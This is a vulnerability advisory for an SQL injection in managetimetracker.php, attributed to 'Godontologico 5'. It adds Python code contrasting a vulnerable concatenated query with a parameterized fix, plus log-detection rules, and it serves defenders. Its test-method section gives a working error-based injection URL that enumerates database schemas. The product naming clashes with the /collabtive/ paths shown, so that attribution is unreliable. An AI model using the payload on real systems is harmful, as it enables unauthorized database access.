Release date:
Updated on:
Affected Systems:
Sourceforge Godontologico 5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65093
Godontologico is software used for clinical research.
Godontologico 5 (and possibly other versions) does not properly validate the user-supplied parameter values that managetimetracker.php receives before using them in database queries, so the script is vulnerable to SQL injection. A successful attack allows unauthorized database operations.
Source: vinicius777
Link: http://www.exploit-db.com/exploits/31141/
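The following is an added example, not code from Godontologico or from the advisory's author; it is written in Python rather than the project's PHP. It contrasts the flawed pattern described above (a request parameter concatenated into SQL) with a hardened lookup that validates the parameter as an integer and binds it, and it adds a small log check a defender can run to spot the error-based pattern quoted in this advisory. The table, column names, IP addresses and log lines are all constructed for the example.

```python
"""Added example (not Godontologico code): unvalidated id parameter vs.
validated, parameterized lookup, plus a detector for the injection
pattern in web-server access logs. Uses an in-memory SQLite database."""
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    # Constructed schema standing in for the real time-tracker table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE timetracker (id INTEGER, project TEXT, hours REAL)")
    conn.executemany("INSERT INTO timetracker VALUES (?, ?, ?)",
                     [(1, "alpha", 2.5), (2, "beta", 4.0), (3, "gamma", 1.0)])
    return conn


def vulnerable_lookup(conn, raw_id):
    # The flawed pattern: the raw request parameter becomes part of the SQL text,
    # so anything after the number is executed as SQL too.
    sql = "SELECT id, project FROM timetracker WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def is_valid_id(raw_id):
    # Whitelist check: an id must be a plain positive integer, nothing else.
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None


def hardened_lookup(conn, raw_id):
    # Validate the type first, then bind the value instead of splicing it in.
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, project FROM timetracker WHERE id = ?",
                        (int(raw_id),)).fetchall()


# Constructed access-log lines (combined-log style); 198.51.100.7 is a
# documentation address used here as the hypothetical attacker.
LOG_LINES = [
    '10.0.0.5 - - [20/Jan/2014:10:00:01 +0000] "GET /collabtive/managetimetracker.php'
    '?action=projectpdf&id=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Jan/2014:10:00:07 +0000] "GET /collabtive/managetimetracker.php'
    '?action=projectpdf&id=2%20and%20(select%201%20from%20(select%20count(*),'
    'concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 500 812',
    '198.51.100.7 - - [20/Jan/2014:10:00:09 +0000] "GET /collabtive/managetimetracker.php'
    '?action=projectpdf&id=2+or+1=1 HTTP/1.1" 200 7030',
    '10.0.0.5 - - [20/Jan/2014:10:00:12 +0000] "GET /collabtive/index.php HTTP/1.1" 200 2210',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

# Rules are checked in order; the first match names the finding.
RULES = [
    ("error_based_floor_rand",
     re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)")),
    ("information_schema_probe", re.compile(r"information_schema\.")),
    ("boolean_tautology", re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b")),
]


def find_injection_attempts(lines):
    """Return (client_ip, rule_name) for each log line whose decoded request
    path matches one of the injection signatures."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # Decode percent-encoding and '+' so the SQL text is visible, then
        # lowercase so the patterns are case-insensitive.
        decoded = unquote_plus(m.group(1)).lower()
        client_ip = line.split(" ", 1)[0]
        for name, pattern in RULES:
            if pattern.search(decoded):
                hits.append((client_ip, name))
                break
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=2:", vulnerable_lookup(db, "2"))
    print("vulnerable, tampered id:", vulnerable_lookup(db, "2 or 1=1"))
    print("hardened, id=2:", hardened_lookup(db, "2"))
    print("hardened accepts tampered id?", is_valid_id("2 or 1=1"))
    for ip, rule in find_injection_attempts(LOG_LINES):
        print("suspicious request from", ip, "->", rule)
```

The tampered value returns every row from the vulnerable lookup because the appended condition is executed as SQL, while the hardened lookup rejects it before any query runs; binding the value as a parameter (rather than only validating it) is what makes the fix hold for non-numeric fields as well. The log rules are deliberately narrow (the advisory's error-based construct, information_schema access, and a numeric tautology) so they can be run over real access logs without drowning in false positives.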
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users bear the risk themselves!
http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2 and (select 1 from (select count(*), concat(select distinct concat(0x7e, 0x27, cast(schema_name as char), 0x27, 0x7e) FROM information_schema.schemata LIMIT 0,1) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a) and 1=1
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sourceforge
-----------
Currently, the vendor has not provided a patch or upgrade. Users of this software are advised to check the vendor's homepage for the latest version:
http://sourceforge.net/projects/godontologico?source=navbar